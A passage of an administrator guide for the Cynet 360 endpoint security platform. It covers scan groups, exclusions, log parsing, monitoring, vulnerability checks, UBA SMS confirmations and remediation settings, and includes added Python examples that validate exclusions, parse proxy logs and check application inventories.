You can add new endpoints to the scan group population by entering an IP address range or CIDR range. Cynet looks for all active hosts within the range and adds them to the list.

Examples of IP range formats are:

IP range with subnet suffix: 192.168.1.0/24

IP range: 192.168.1.0-192.168.1.255

To add the endpoints:

Click IP Ranges.

Enter the IP range.

Click Add.

Note

When you enter a valid IP Range or CIDR range, the number of addresses within that range is displayed.

The IP range is displayed in the Population List.

Using Active Directory

You can add new endpoints to the scan group population by entering the names of Active Directory OUs or SGs. Cynet polls the active directory domain specified in Group Information settings and looks for all computer objects in this OU or SG.

To add an OU:

Click Active Directory.

Select OU.

Enter the OU name.

Click Add.

Methods for specifying and including or excluding OUs:

OU Type | Description
Add an entire AD OU Tree | *
Add Specific OU | Servers
Exclude Specific OU | Workstations. Excluded OUs are highlighted in red.
Add nested OU | Workstations + Locations + Laptops

Notes

You do not need to enter Distinguished Names (DNs) for OUs. Cynet performs a query in the tree structure for any OU that matches the name you enter.

If multiple OUs contain the same name but reside in different branches of the tree structure, use the Nested OU option (+ symbol) to specify the branch OU to be polled.

To manually poll Active Directory for the current list of computer objects in the specified OUs, and to refresh the endpoints list, click Sync, then Validate AD Connection.

Note

The Active Directory sync process might take a few minutes, depending on the number of OUs specified and the number of hosts that exist in the OUs. After the sync has completed, a ‘Synced Successfully’ message displays.

To add an SG:

Click Active Directory.

Select SG.

Enter the SG name.

Click Add.


Removing an Active Directory Listing

To remove a host, IP range, OU, or SG from the scan population, select the item and click Delete. Confirm the deletion.

Configuring Scan Schedule Settings

You can configure scan groups to be scanned according to a schedule. By default, all days and all times are enabled for scanning.

To disable scanning on a day of the week, clear that day’s checkbox.

To set time restrictions for scans, enter Start Time and End Time. Times are in 24-hour HH:MM format.

You can also configure a schedule for when scans must NOT be performed by clearing Scan Enabled.

To add a new scan schedule, configure the scan settings and click Add.

To disable the whole scan group:

Clear Scan enabled.

Click Update.

Cynet does not scan any hosts in this scan group.

Setting Scan Frequency (Throttle Settings)

You can use Scan Throttling settings to control the number of concurrent scans during scan cycles in order to scan environments more efficiently.

The following settings are available in the ADVANCED tab:

Max Concurrent Scanned Hosts

This is the maximum number of hosts the Cynet server can attempt to scan at any one time. This setting throttles the scanner and prevents flooding the network with scan attempts.

The default setting is 200 hosts.

Scanned Hosts Timeout

The timeout value for responses from the PsExec process when using the Remote Procedure Calls (RPC) distribution type.

The default setting is 80 seconds.

Concurrent Remediation Actions

Use this setting to specify the maximum number of remediation actions the server can attempt at any one time.

The default setting is 300 actions.

Excluding IP Addresses and Hosts from Scans

Individual IP addresses, IP address ranges, or Hostnames can be excluded from scanning, even if they are configured in a scan group.

To exclude them from being scanned:

In the CONFIGURATION tab, scroll down to EXCLUSION SETTINGS.

Enter an IP address or an IP address range into the text box.

Acceptable IP and IP Range formats are as follows:

Format | Example
Explicit IP address | 192.168.0.1
IP address range | 192.168.0.1-192.168.0.255
IP address with subnet prefix | 192.168.0.1/24
Hostname | johnsmith-lp

To add the exclusion to the list, click Add.

Note

When a valid IP Range or CIDR range is entered, the number of addresses within that range is displayed.

To remove an IP address or IP address range from the exclusion list, select the item and click Delete.

Cynet confirms the deletion.
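As an added example (not Cynet's code), the following Python validates exclusion entries in the four accepted formats, computes the address count the UI displays for a valid range, and checks whether a given host or IP address falls under an exclusion. It assumes that 192.168.0.1/24 stands for the whole 192.168.0.0/24 block, that hostnames are single DNS labels as in the guide's example, and that hostname matching is case-insensitive.

```python
import ipaddress
import re

# Assumption: a hostname entry is a single DNS label such as "johnsmith-lp".
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


class Exclusion:
    """One exclusion-list entry: explicit IP, IP range, CIDR, or hostname."""

    def __init__(self, raw):
        self.raw = raw.strip()
        self.kind, self.first, self.last = self._classify(self.raw)

    @staticmethod
    def _classify(text):
        if "/" in text:
            # strict=False lets "192.168.0.1/24" stand for 192.168.0.0/24
            # (assumption about how a host address with a prefix is read).
            net = ipaddress.ip_network(text, strict=False)
            return "cidr", net[0], net[-1]
        if "-" in text:
            start, _, end = text.partition("-")
            try:
                first = ipaddress.ip_address(start.strip())
                last = ipaddress.ip_address(end.strip())
            except ValueError:
                first = last = None          # not a range; may be a hostname
            if first is not None:
                if last < first:
                    raise ValueError(f"range end precedes start: {text}")
                return "range", first, last
        try:
            addr = ipaddress.ip_address(text)
            return "ip", addr, addr
        except ValueError:
            pass
        if HOSTNAME_RE.match(text):
            return "hostname", None, None
        raise ValueError(f"unrecognised exclusion format: {text!r}")

    def address_count(self):
        """Number of addresses covered (what the UI shows for a valid range)."""
        if self.kind == "hostname":
            return 1
        return int(self.last) - int(self.first) + 1

    def matches(self, target):
        """True if a hostname or IP address string falls under this entry."""
        if self.kind == "hostname":
            return target.strip().lower() == self.raw.lower()
        try:
            addr = ipaddress.ip_address(target.strip())
        except ValueError:
            return False                     # a hostname never matches an IP entry
        if addr.version != self.first.version:
            return False
        return self.first <= addr <= self.last


def load_exclusions(entries):
    """Parse every entry, raising ValueError on the first invalid one."""
    return [Exclusion(entry) for entry in entries]


def is_excluded(target, exclusions):
    """True if any exclusion entry covers the target host or address."""
    return any(exclusion.matches(target) for exclusion in exclusions)


# Constructed exclusion list: the four formats from the table above plus one
# small CIDR block.
EXCLUSION_ENTRIES = [
    "192.168.0.1",
    "192.168.0.1-192.168.0.255",
    "192.168.0.1/24",
    "johnsmith-lp",
    "10.0.5.0/30",
]

if __name__ == "__main__":
    exclusions = load_exclusions(EXCLUSION_ENTRIES)
    for exclusion in exclusions:
        print(f"{exclusion.raw:<28} {exclusion.kind:<9} "
              f"{exclusion.address_count():>4} address(es)")
    for host in ("192.168.0.77", "192.168.1.5", "JOHNSMITH-LP", "10.0.5.3"):
        print(f"{host:<16} excluded={is_excluded(host, exclusions)}")
```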

Excluding Analysis Policies from Scans

You can use Policy Exclusion Settings to exclude policies from running on specified hosts.

Note

Excluding policies from running on hosts might have an adverse effect on detection analysis. Policy exclusions must be discussed with a Cynet representative before any changes are made.

To exclude a policy from running on endpoints:

In the ADVANCED tab, scroll down to POLICY EXCLUSION SETTINGS.

Type a few characters of the Policy Title to exclude.

Cynet displays all matching Policy Titles.

Select the policy to exclude.

To select hosts to exclude, in the Wild Card field, enter a regular expression.

You can exclude multiple hosts from a policy by using regex.

Some examples are:

To exclude Hostname 123 from a policy, use Hostname123.

To exclude workstations that begin with the character W, use W*.

To add the host or wildcard exclusion for this policy, click Add.

When you have added the exclusion, a menu displays all exclusion entries. Each entry shows the policy name and the host/regex match. For the matching hosts, this policy is not factored into the risk level calculation.

To delete a policy exclusion, click Remove.

To edit a policy exclusion:

Click Edit.

You can now edit the wildcard field.

To apply the changes to the policy exclusion, click Save.

Excluding Domains from Scans

You can use Domain Whitelisting settings to filter out trusted domains from analysis.

To add a domain to the whitelist:

In the Advanced tab, scroll down to Domain Whitelisting Settings.

Enter the domain to be whitelisted.

Click Add Domain.

The domain is displayed in the list.

To edit an existing whitelisted domain entry:

Select the domain name.

Click Update.

To delete an existing whitelisted domain:

Select the domain name.

Click Remove.

Configuring Network Traffic Analysis Settings

You can configure Traffic Analysis settings (in Configuration) for the Network Interface Card (NIC) you want to use to analyze traffic from a SPAN port or a network tap port.

To configure Traffic Analysis settings:

In the Configuration tab, scroll down to Network Traffic Analysis Settings.

Select the NIC to be used for network traffic analysis.

Click Save Adapters.

Configuring Log Parser Settings

Log Parser Settings enables parsing and ingesting of log data from external sources such as a proxy server.

To configure a new set of logs to parse:

In the Configuration tab, scroll down to Log Parser Settings.

Click Create.

The Log Parser definition window displays.

In the Log Parser definition window, you can define how to parse proxy logs. The log entries consist of columns separated by one or more spaces.

Note

A column represents a field.

Optionally parsed fields are:

Source IP

The client IP address.

Destination IP

The Domain destination IP address.

User

The User identity for the requesting client.

Method

The method to obtain an object.

URL address

The requested URL.

Date

The time when the proxy server started to log the transaction. This happens at the end of a transaction lifecycle, after receiving the entire request and after sending the entire response to the HTTP client.

Host

The Hostname of the original requested URL.

Port

The Destination port.

Event Identifier

A unique number in each log that identifies it from all others.

Regex Separator

The character which separates fields of information in the log.

Fields Format Type

There are two types of field formats: By Name or By Offset. Parsing by name indicates parsing fields within the log according to the name of each field. Parsing by offset indicates parsing fields within the log according to each field’s column location.

Each log file has a different set of fields. Not all logs have the same fields. Each file provides its own parsing configuration.

Parser Modes of Operation

To extract a field from a log entry, the parser walks through a string formatted in the configuration table for the current log file and field. Each character in the formatted string indicates the next step the parser must take. The basic string format is an integer, indicating the location of the requested data in the column index. For example, the URL field string format could be “2” because the URL is in the third column of the log entry.

Formatting Rules

Columns are separated by one or more spaces unless they are in quotations.

The first column index is zero.

For an undefined field, use “100”.

To add two columns, use index1 + index2.

To remove a prefix, use index - prefixSize.

For example:

The column contains User=Bella and we want to parse only Bella (assuming the User column is in second place, index 1). The prefix User= is five characters long.

Use string format = 1-5

For fields that are located in a different column in each row of the log but have a fixed prefix, use ~ prefix.

For example: every URL includes the prefix request=, as in request=http://www.google.com

URL format string = ~ request=

The parser searches each line for the column that starts with the given prefix and extracts its data.

Remark: there must be a space between each index, +, - and ~ in the string format.

For example: ~ request - 7 + 8
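The offset-based format strings above, implemented as an added example (not Cynet's parser code): a small Python parser that splits an entry into space-separated columns while honoring quotes, walks a format string token by token (column index, “100” for undefined, ~ prefix, - prefixSize, + index) and applies a constructed proxy parser configuration to a constructed log entry. It assumes that quotes are stripped from quoted columns and that the compact 1-5 spelling is equivalent to 1 - 5.

```python
import re

# Column index the guide reserves for "this field is not present in the log".
UNDEFINED_INDEX = 100

# A column is a double-quoted run (spaces allowed inside) or a run of
# non-space characters; one or more spaces separate columns.
COLUMN_RE = re.compile(r'"([^"]*)"|(\S+)')

# Format-string tokens: a "~ prefix" search, a column index or prefix size,
# or a + / - operator. The guide wants spaces around each index, +, - and ~;
# the compact "1-5" spelling from its own example is accepted too (assumption).
FORMAT_TOKEN_RE = re.compile(r"~\s*(\S+)|(\d+)|([+-])")


def split_columns(line):
    """Split one log entry into columns; surrounding quotes are stripped (assumption)."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in COLUMN_RE.finditer(line)]


def tokenize_format(fmt):
    """Turn a format string such as '~ request= - 8 + 8' into typed tokens."""
    tokens = []
    for prefix, number, operator in FORMAT_TOKEN_RE.findall(fmt):
        if prefix:
            tokens.append(("prefix", prefix))
        elif number:
            tokens.append(("index", int(number)))
        else:
            tokens.append(("op", operator))
    return tokens


def column_at(columns, index):
    return columns[index] if 0 <= index < len(columns) else None


def extract_field(columns, fmt):
    """Walk the format string step by step, as the guide describes.

    Returns None for an undefined field ("100"), a missing column, or a
    prefix that no column of this entry starts with.
    """
    tokens = tokenize_format(fmt)
    if not tokens:
        raise ValueError(f"empty format string: {fmt!r}")
    kind, arg = tokens[0]
    if kind == "index":
        value = None if arg == UNDEFINED_INDEX else column_at(columns, arg)
    elif kind == "prefix":
        value = next((c for c in columns if c.startswith(arg)), None)
    else:
        raise ValueError(f"format must start with an index or ~ prefix: {fmt!r}")
    if value is None:
        return None
    for pos in range(1, len(tokens), 2):
        if (pos + 1 >= len(tokens) or tokens[pos][0] != "op"
                or tokens[pos + 1][0] != "index"):
            raise ValueError(f"expected '+ index' or '- size' in {fmt!r}")
        operator, number = tokens[pos][1], tokens[pos + 1][1]
        if operator == "-":
            value = value[number:]          # drop a fixed-size prefix
        else:
            extra = column_at(columns, number)
            if extra is None:
                return None
            value += extra                  # append another column
    return value


def parse_entry(line, field_formats):
    """Apply one parser configuration (field name -> format string) to an entry."""
    columns = split_columns(line)
    return {name: extract_field(columns, fmt) for name, fmt in field_formats.items()}


# Constructed proxy log entry, columns 0..8: date, User=..., source IP,
# destination IP, method, quoted user agent, port, request=<scheme://host>, path.
SAMPLE_LOG_LINE = (
    "2020-05-11T10:00:00Z User=Bella 10.0.0.15 93.184.216.34 GET "
    '"Mozilla/5.0 (Windows NT 10.0)" 443 '
    "request=http://www.google.com /search?q=cynet"
)

# Constructed parser configuration for the entry above.
PROXY_FIELD_FORMATS = {
    "Date": "0",
    "User": "1-5",                    # column 1 minus the 5-character "User=" prefix
    "Source IP": "2",
    "Destination IP": "3",
    "Method": "4",
    "URL": "~ request= - 8 + 8",      # find the request= column, strip it, add the path
    "Host": "~ request= - 15",        # strip "request=http://" (15 characters)
    "Port": "6",
    "Event Identifier": "100",        # this log type carries no event identifier
}

if __name__ == "__main__":
    for name, value in parse_entry(SAMPLE_LOG_LINE, PROXY_FIELD_FORMATS).items():
        print(f"{name:>16}: {value}")
```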

Example:

In the example below, the proxy log is being parsed to match the correct fields:

When the parser is defined, click Save.

Note

The Proxy Parser name must include the word “proxy” with an integer following it for identification.

To test a defined parser for correct formatting:

Select the parser from the drop-down menu.

Enter your sample log string in the text box.

To begin parsing your log string, click Verify Parser.

Check that the field names match up to the correct fields within the log string.

To go back to fix defined parsers, click Edit.

To remove a defined parser, click Delete.

Parser Mode of Operation—Using Name Indication

To extract a field from a log entry, the parser walks through a string formatted in the configuration table for the current log file and field. Each character in the formatted string indicates the next step the parser must take. In this mode, the basic string format uses key indicators: the field name followed by the requested data. For example, the URL field name is followed by its value, such as http://www.gmail.com.

Example:

In the example below, the VPN log is being parsed to match the correct fields based on token names:

In the Log Parser definition window, enter a proxy parser name. Each field’s index displays in its corresponding field name.

Analytics Server Configurations

As part of the File Monitoring feature, Cynet uses an analytics server based on ELK (Elasticsearch, Logstash, Kibana). This configuration enables the connection between the Cynet server and the analytics server.

To configure the Analytics Server:

Select the Configure Analytics Server checkbox.

Complete the displayed fields.

Note

The File Monitoring feature does not work without the analytics server.

Monitoring Malicious Logins

Cynet 360 enables you to receive alerts whenever a malicious login is detected.

You can create fake credentials of a deception User, which you can then use to monitor failed logins. When a failed login to a deception User is detected, an alert is generated.
For information about creating and managing deception Users, see the Deception Users section.

IMPORTANT!

Adding credentials to a real host creates fake User credential files on the host acting as decoys.

Configuring Advanced Settings

This section describes advanced configuration settings.

Configuring Connection Settings

In this section, you can specify the Cynet primary and secondary server IP addresses, as well as a proxy IP address.

To configure Connection Settings:

Navigate to the Advanced tab.

Fill out the IP address fields as follows:

Field | Description
Primary Cynet Server Address | Specify the primary IP address and port of the Cynet server. This address is used by the EPS to send scan data.
Secondary Cynet Server Address | Specify the secondary IP address and port of the Cynet server. This address is used when the primary server is unavailable. This is an optional field.
Server Proxy Settings | If an Internet proxy is used, specify the proxy IP address and port for the Cynet server to synchronize with the Cynet Virtual Private Cloud (VPC).

Configuring Privacy & Compliance Settings

You can use Privacy & Compliance settings to limit the amount of information collected from endpoints. You can also anonymize information to be sent to the Cynet SOC.

You can enable the following settings:

Setting | Description
Send Scan Errors to SIEM | Sends scan errors via syslog to the IP address configured in SIEM settings.
Send Audit Records to SIEM | Enables the Cynet server to send audit messages via syslog to a configured SIEM.
Unique File Analysis by SOC | Allows the system (Cynet SOC) to automatically send unique files to the SSE sandbox for analysis.
Analyzed File Retention | Specify the number of days to keep analyzed file samples within the Cynet quarantine. The default is 30 days.
Log File Retention | Specify the number of days to keep the Cynet system log files. The default is 7 days.
External Data Privacy | Prevents actual Hostnames and Usernames from being sent to the Cynet SOC. Host or User IDs are sent instead.
Internal Data Privacy | Restricts sensitive, private data from being shown in the UI.

Disabling Collection of Data

These settings prevent the CynetEPS from collecting certain information when performing scans.

You can disable the following data:

Data | Description
ARP Table Data Collection | Disables the collection of ARP Table data by the EPS.
Certificate Data Collection | Disables the collection of Certificate data by the EPS.
DNS Cache Data Collection | Disables the collection of DNS Cache data by the EPS.
Hosts File Data Collection | Disables the collection of Hosts File data by the EPS.
Installed Software Data Collection | Disables the collection of Installed Software data by the EPS.
IP Settings Data Collection | Disables the collection of IP settings data by the EPS.
User Login Data Collection | Disables the collection of User login data by the EPS.
Microsoft Updates Data Collection | Disables the collection of Microsoft Updates data by the EPS.
Network Interface Data Collection | Disables the collection of Network Interface data by the EPS.
Network Share Data Collection | Disables the collection of Network Share data by the EPS.

Configuring Cynet SOC Settings

The following additional advanced settings enable Operators to configure how data is transferred to and from the Cynet SOC.

Field | Description
Cynet SOC File Analysis | Automatically sends files to the Cynet SOC for further analysis.
Automatic Updates | Enables the Cynet server to download and install updates from the Cynet VPC.
Command Line Sync | Disables the synchronization of command-line parameters sent by the EPS to the Cynet SOC. Cynet does not recommend that you disable this parameter.
File Whitelisting | Enables whitelisting of known files by the Cynet SOC.
Memory String Sync | Enables the synchronization of memory strings sent by the EPS to the Cynet SOC. Cynet does not recommend that you disable this parameter.

Note

Cynet recommends leaving these settings, especially the Anonymization and Disable … Collection settings, with their default values to perform complete threat analysis on hosts. Limiting collected data can negatively impact Cynet’s threat detection.

Configuring Slave Server Settings

You can use the Slave server settings to configure a Cynet server as a Slave server in a distributed architecture.

To configure a Cynet Server as a Slave Server, in the Master and Slave Server Settings section:

Enter the Slave Machine Name.

Enter the Cynet Client ID.

Enter the Slave IP address.

Click Add.

Configuring Console Settings

You can use the UI session Console setting to configure how long a session in the Cynet console lasts before automatically logging out a User.

The Inactivity Logout Timeout can range from 1 minute to 525,600 minutes, or one year. The default setting is 20 minutes.

Windows Events

You can collect Windows events and send the data to FileService on the Cynet server. The server stores these events in an Elasticsearch database.

You can use Cynet 360 to search the events by:

ID

Event type

Host name

Note

For more information, see the Cynet Zendesk article “Cynet 360 Release Notes- Version 3.4.9”.

Configuring Cynet 360 to Collect Windows Events

To configure Cynet 360 to collect Windows events:

Enable the Windows events collection feature in Cynet 360:

On the main menu, click .

In the Scan Groups tab, scroll down to the Windows Events Monitoring section.

Select Enable Windows Events Monitoring.

Click Save.

Create a configuration to define which Windows events to monitor:

On the main menu, click .

In the Windows Events tab, click Create.

Create the new configuration and click Add.

View Windows events:

From the main menu, click .

On the top menu, click Hosts.

Select Windows Events.

Filter the results by:

Event ID

Event Type

Host Name

Source

Date Created

File Monitoring Settings

Cynet 360 enables you to monitor files more closely when:

Files are created

Files are renamed

Files are executed

These actions are saved in the Elasticsearch database, which can be easily queried for auditing purposes.

Note

File monitoring is only available for Windows, and only for Windows 7 and up.

Configuring File Monitoring

The following are the main steps to configure file monitoring in Cynet 360:

Enable file monitoring in Cynet 360.

Set the extensions to be monitored.

Connect to the analytics server.

The following sections describe each of these steps in more detail.

Enabling File Monitoring

To enable file monitoring in Cynet 360:

On the main menu, click .

In the Scan Groups tab, scroll down to the File Monitoring section.

Select Enable File Monitoring.

Click Save.

Setting File Monitoring Extensions

To specify the file extensions that you want to monitor for changes:

On the main menu, click .

In the Advanced tab, scroll down to the File Monitoring section.

Enter a file extension and click +.

Repeat this step for as many file extensions as you like.

Enter the time interval in minutes in which file monitor reports will be sent to the server.

Click Save.

Connecting to the Analytics Server

The analytics server is the Elasticsearch database which Cynet uses to store File Monitoring events.

To configure the analytics server:

On the main menu, click .

In the Configuration tab, select Configure Analytics Server.

Enter the connectivity settings for the analytics server.

To test the settings, click Test Connectivity.

Click Save.

Analysis

The Analysis page contains configuration settings for Cynet’s Smart Simulation Execution (SSE) sandbox. The SSE sandbox enables dynamic file analysis.

Dynamic Analysis Settings

The Cynet SSE dynamic analysis can be configured for either a local sandbox or a cloud-based sandbox. To enable the cloud-based sandbox:

Select Enable SSE Sandbox Analysis.

Select Enable Cloud Sandbox.

Click Save.

To enable a local Sandbox:

Select Enable SSE Sandbox Analysis.

Select Enable Local Sandbox.

Enter the Local Sandbox IP address.

Click Save.

Deep Scan Settings

You can configure the time intervals for the Deep Scan process. There are two available settings:

Deep Scan Update Interval

You can use this setting to configure how often the Cynet Deep Scanner (CynetDS.exe) sends data back to the Cynet server for analysis.

The minimum value is two minutes, and the default value is fifteen minutes.

Deep Scan Time Limit

You can use this setting to configure the time that the CynetDS runs on the endpoint to collect deep scan data. At the end of this time period, the CynetDS terminates.

The minimum value is fifteen minutes, and the default value is three hundred minutes.

After configuring the settings, click Save.

Alert Process Tree

Cynet 360 includes a new process tree visualization. If an alert is triggered on a file, you can see which processes were run, up to five levels down. This enables you to better understand which processes took place in an attack, what went wrong, and who was involved.

Example

Cynet 360 detected suspicious activity regarding an Excel file. When you look at the Alert Process Tree visualization, it becomes clear that the issue is the macro file, not the Excel file.

Viewing the Alert Process Tree

To view the Alert Process Tree for an alert:

From the main menu, click .

Locate the alert you want to investigate by:

Scrolling to the alert

Performing a search for the alert

Filtering the list of alerts by alert type

On the alert you want to investigate, click .

A detailed description of the alert is displayed and the Process Tree shows up to five levels of processes that were run, which triggered the alert.

The Process Tree shows the name of the processes, the order in which they were run, and the User(s) who ran the processes.

Configuring Vulnerability Management Settings

In the Vulnerability Management page, you can configure the following functions:

Windows Patch Validation

Unauthorized Applications

Application Patch Validation

Agents Validation

UBA Management

Configuring Windows Patch Validation:

The Cynet scanner queries the Windows Update subsystem at the endpoint and maps all the available Knowledge Bases (KBs) that are ready to be installed. When the EPS detects that there are KBs that have not been installed, it generates a medium level alert that includes the list of KBs that are not installed yet.

Operators can whitelist Windows KB updates, which are known to be missing or uninstalled. They can ensure that these updates do not generate an alert.

To add Windows KBs to the whitelist, type the name of the KB. Each KB displays on a new line.

Unauthorized Applications

The Cynet scanner queries the Windows Add/Remove programs subsystem at the endpoint. It compares the list received to the list of applications that are unauthorized to run on the endpoint. When the EPS detects that there are unauthorized applications installed at the endpoint, it generates a medium severity alert that includes the list of unauthorized applications installed at the endpoint.

Operators can add or remove applications from the unauthorized applications list. The list includes applications that Cynet’s R&D has classified as “Potentially” restricted.

To add an application to the unauthorized applications list, add the name of the application on a new line.

Note

Enter the name of the application exactly as it is displayed in “Add/Remove Programs” in Windows.

Application Patch Validation

The Cynet scanner queries the Windows Add/Remove programs subsystem at the endpoint and verifies that the latest patched version of the application is installed.

For example, if the organization’s security team defines that an Internet Explorer version below 11 is considered vulnerable, Cynet scans all the endpoints in the organization and generates a medium severity alert of all the endpoints containing an Internet Explorer version below version 11.

Operators can add or remove applications that must be installed with a minimum version.

Note

Enter the name of the application exactly as it is displayed in “Add/Remove Programs” in Windows.

Agents Validation

Operators can enter a list of third-party applications and processes that are considered crucial on the endpoint. The Cynet scanner queries the running-process list (as shown in Windows Task Manager) and Add/Remove Programs to verify the following:

Is a third-party application installed?

Is a third-party application running?

Cynet scans all the endpoints in the organization and generates a medium severity alert that lists the non-compliant endpoints, in either of these states:

Application is installed but not running

Application is not installed and not running

Operators can add or remove applications from the important third-party applications list.

When adding applications to the list:

Enter the name of the application as it is displayed in Windows “Add/Remove Programs”

Enter the process of the application as it displays in Windows Task Manager
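The three Add/Remove Programs checks above (unauthorized applications, minimum application versions, and crucial third-party agents) reduce to a small amount of logic, shown here as an added example that is not Cynet’s code. On a real endpoint the installed-application inventory would come from the Windows Uninstall registry keys and the running-process list; here both are constructed, and the application names, process names and version thresholds are assumptions for illustration only.

```python
"""Evaluate an endpoint's application inventory against the three policies
described above: unauthorized applications, minimum versions and crucial agents.
Added example, not Cynet code; the inventory and policy are constructed."""
from dataclasses import dataclass
import re


def parse_version(text: str) -> tuple:
    """Turn '11.0.9600.19596' into (11, 0, 9600, 19596) so versions compare
    numerically; comparing the raw strings would rank '9.0' above '11.0'."""
    return tuple(int(part) for part in re.findall(r"\d+", text)) or (0,)


@dataclass
class Policy:
    unauthorized: set          # display names exactly as in Add/Remove Programs
    minimum_versions: dict     # display name -> lowest acceptable version
    crucial_agents: dict       # display name -> process name as in Task Manager


@dataclass
class Finding:
    check: str
    detail: str
    severity: str = "medium"   # all three checks raise medium severity alerts


def evaluate_host(installed: dict, running: set, policy: Policy) -> list:
    """installed: display name -> version string (Add/Remove Programs);
    running: image names from the process list. Returns the findings for one host."""
    findings = []
    running_lower = {p.lower() for p in running}

    # 1. Unauthorized applications: exact display-name match, as the note requires.
    for name in sorted(policy.unauthorized & set(installed)):
        findings.append(Finding("unauthorized_application",
                                f"{name} {installed[name]} is installed"))

    # 2. Application patch validation: installed but below the minimum version.
    for name, minimum in policy.minimum_versions.items():
        if name in installed and parse_version(installed[name]) < parse_version(minimum):
            findings.append(Finding("application_patch",
                                    f"{name} {installed[name]} is below minimum {minimum}"))

    # 3. Agents validation: the two non-compliant states listed above.
    for name, process in policy.crucial_agents.items():
        if name not in installed:
            findings.append(Finding("agent_validation",
                                    f"{name} is not installed and not running"))
        elif process.lower() not in running_lower:
            findings.append(Finding("agent_validation",
                                    f"{name} is installed but not running ({process})"))
    return findings


# Constructed sample policy and inventory (assumptions for illustration).
POLICY = Policy(
    unauthorized={"uTorrent", "TeamViewer"},
    minimum_versions={"Internet Explorer": "11.0"},
    crucial_agents={"Acme Backup Agent": "acmebackup.exe", "Acme DLP": "acmedlp.exe"},
)
INSTALLED = {"Internet Explorer": "9.0.8112", "uTorrent": "3.5.5", "Acme Backup Agent": "2.4.1"}
RUNNING = {"explorer.exe", "svchost.exe", "CynetEPS.exe"}

if __name__ == "__main__":
    for f in evaluate_host(INSTALLED, RUNNING, POLICY):
        print(f.severity, f.check, f.detail)
```

The version parser is the part that matters: comparing version strings lexically ranks “9.0” above “11.0” and would silently pass an outdated Internet Explorer, so versions are split into integer tuples first. Display names are matched exactly, as the notes above require, so a typo in the policy means the check never fires; process names are compared case-insensitively because image-name casing varies between sources.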

Configuring UBA Management

Cynet 360 performs User and Entity Behavioral Analysis (UEBA) by collecting and analyzing User behavioral data. When an unusual login occurs, Cynet can notify the User through the SMS Confirmation feature and ask the User to confirm or decline the login. If the User declines the login, Cynet 360 generates an alert for unusual User behavior.

Cynet SMS verification messages are always sent from the phone number +1 (646) 846-8440, and the hyperlink within the message points to Cynet’s User verification site. Because a confirmation SMS is itself a plausible phishing lure, tell Users to expect these messages only from that number and to treat a confirmation request from any other number as suspicious.

Configuring Users for UBA

To activate UBA, you must first configure a User with a mobile number. There are two methods to configure Users:

Selecting from Active Directory

Importing a CSV file

To configure the User from Active Directory:

From the Settings page, click the Configuration tab.

Scroll down to Import Users Data Settings.

Select the User.

In the drop-down menu, select Mobile.

In the Mobile field, check that a phone number is available or enter the User’s phone number.

Click Save.

To configure the User from a CSV file:

From the Settings page, click the Configuration tab.

Scroll down to Import Users data from CSV File.

In the User Name field, enter the zero-based index of the CSV column that holds the user name. For example, to use the first column, enter 0.

In the drop-down menu, select Mobile.

In the Mobile field, enter the zero-based index of the CSV column that holds the mobile number. For example, to use the second column, enter 1.

To select and upload the file, click Choose File, then click Upload CSV file.

To send an SMS confirmation request to the User when suspicious activity is detected, select the Enable SMS Confirmations checkbox.

An alert is opened in the system only when the User replies in the SMS that the activity was not legitimate.

Managing UBA Policies

UBA policies define the event triggers that generate confirmation requests and alerts. At setup, the UBA Management tab contains a set of pre-configured event triggers.

To manage UBA event triggers, click the UBA Management tab.

Configuring UBA Event Triggers

The UBA Management page enables you to:

Edit or update an existing UBA event trigger

Create a new UBA event trigger

To configure an existing UBA event trigger:

In the relevant event trigger field, click Edit.

From the Update Event window, you can modify pre-defined settings:

Name

Description

Query String

Keys

Question

Notification

Severity level

Time Interval in Minutes

Click Update.

To activate the event trigger, click Enable.

To create a new UBA event trigger:

CAUTION!

Event triggers are based on SQL queries. It is recommended that only advanced Users configure event triggers.

Click Create.

Populate the fields:

Enter the SQL query string for the event trigger

The Keys field is populated from the data entered in the Query String field. Clear the checkboxes of keys that must not be included in the notification message sent to the User

In the Question field, enter the question that the User will see in the SMS

To send a notification by SMS, select the SMS checkbox

Set the severity level of the event trigger

Set the time interval of the UBA event cycle

Click Save.

Customizing Auto-Remediation Actions

This section describes the range of remediation actions the User can take.

Configuring Remediation Settings

In the Advanced page you can use Remediation settings to configure auto-remediation to retry remediation actions if they initially fail.

Remediation Retry Attempts

You can set the maximum number of times the system attempts a remediation action. The default is 48 retries.

Remediation Retry Interval

You can set the time interval between remediation retries in minutes. The default is 30 minutes, so the default 48 retries cover a 24-hour window.

Custom Remediation Playbooks

The Custom Remediation Playbook feature extends the Cynet 360 remediation capabilities by storing a collection of Custom Remediation Actions and running them sequentially or in parallel.

It is possible to use Playbooks as part of the Remediation actions as well as Auto-Remediation actions.

Each of these actions can run on the Cynet Server or on an EPS Endpoint, and can originate from a file, host, or User.

Configuring the Custom Remediation Playbook

Note

Before creating a Playbook, you must first create at least one Custom Remediation action.

To configure the Custom Remediation Playbook:

          1. On the main menu, click .

From the Remediation tab click PLAYBOOKS.

To add a new Playbook, click Create.

Applying the Custom Remediation Playbook

To apply the Custom Remediation Playbook to a File or User:

          1. From the main menu, click .

Select an entity from the list.

Click Actions.

Choose whether to run the Custom Remediation Playbook as part of a Remediation or an Auto-Remediation action:

To run it as part of a Remediation action, click the Playbook action on the Remediation top menu.

To run it as part of an Auto-Remediation action, choose Auto Remediation on the top menu, and in the Auto-Remediation pane associate the Playbook action with the Auto-Remediation Alert action.

Viewing System Information

The System Info page provides general information about the system, as well as information regarding the health of the system.

Main Info

The Main Info section contains information about the Cynet installation.

Cynet Version

The current version of Cynet 360.

Cynet Installation Directory

The path of the Cynet system installation.

Disk Space

The amount of disk space used, in MB, compared with the total disk space, in MB.

All system drives are displayed, but Cynet monitors only the drive on which it is installed for low disk space.

System Health

The System Health section contains information regarding the following services:

Service: Description (a healthy service is marked with the health status icon)

Cynet Service: Displays the health status of the main Cynet service.
DB – CynetDB Service: Displays the health status of the Cynet database service.
Sync Cloud: Displays the health status of the connection to the Cynet VPC cloud.
Monitor – CSHelper Service: Displays the health status of the Cynet Helper service, which monitors the Cynet service and the CynetDB service.
Local Smart Simulation Execution: Displays the health status of the connection to the Cynet SSE sandbox, for both local and cloud sandbox connections.
Last Antivirus Update: Displays the date and time of the last antivirus update.

Configuring Alerts

On the Alerts page, you can configure settings for the following:

Email Settings

To configure the Email Settings, from the Settings page, select the Alerts tab and scroll down to the Email Settings section.

You can configure the following settings for email alerts:

